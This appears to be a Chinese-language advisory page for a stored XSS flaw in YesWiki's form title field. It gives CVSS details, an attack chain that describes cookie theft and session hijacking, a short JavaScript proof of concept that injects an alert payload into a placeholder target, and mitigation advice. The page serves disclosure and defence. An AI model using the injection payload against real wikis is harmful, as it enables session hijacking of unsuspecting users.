CVE-2026-34598 CVSS 6.1 中危

CVE-2026-34598 YesWiki存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34598

漏洞类型

存储型XSS (Stored XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

YesWiki

漏洞概述

YesWiki在4.6.0版本之前的表单标题字段中存在存储型盲注XSS漏洞。未经身份验证的攻击者可注入恶意JS脚本，当用户访问受影响页面时触发，导致窃取敏感信息或会话劫持。

技术细节

该漏洞源于YesWiki对表单标题字段缺乏充分的输入过滤和输出编码。攻击者无需认证（PR:N）即可构造包含恶意JavaScript代码的表单标题。该载荷被存储在后端数据库中，形成持久化威胁。由于是盲注XSS，攻击者无法直接看到执行结果，但任何浏览该页面的用户都会在浏览器上下文中执行代码。CVSS向量显示该漏洞可通过网络利用（AV:N），利用复杂度低（AC:L），且由于作用域改变（S:C），可能进一步影响同一浏览器的其他页面。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统使用的是存在漏洞的YesWiki版本（< 4.6.0）。

STEP 2

2. 载荷构造

攻击者构造针对表单标题字段的恶意JavaScript代码（如窃取Cookie的脚本）。

STEP 3

3. 漏洞利用

攻击者无需登录，向目标Wiki页面提交包含恶意脚本的表单标题，数据被存储至数据库。

STEP 4

4. 触发执行

当普通用户或管理员访问该被注入的页面时，浏览器解析HTML并执行恶意脚本。

STEP 5

5. 后果达成

攻击者利用执行结果窃取用户凭证，劫持会话或进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
Proof of Concept (PoC) for CVE-2026-34598
Description: Injecting a malicious script into the form title field.
-->

<script>
// Simulating the vulnerable request
const payload = '<img src=x onerror=alert(1)>';

fetch('http://target-yeswiki.com/?PageEdit', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: `title=${encodeURIComponent(payload)}&body=Content&submit=Save`
}).then(response => {
    console.log('Payload injected successfully');
});

// When an admin/user visits the page, the alert triggers.
</script>

影响范围

YesWiki < 4.6.0

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）以拦截包含常见XSS攻击特征的请求。同时，管理员应筛查数据库中现有的表单标题数据，移除任何可疑的脚本内容，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表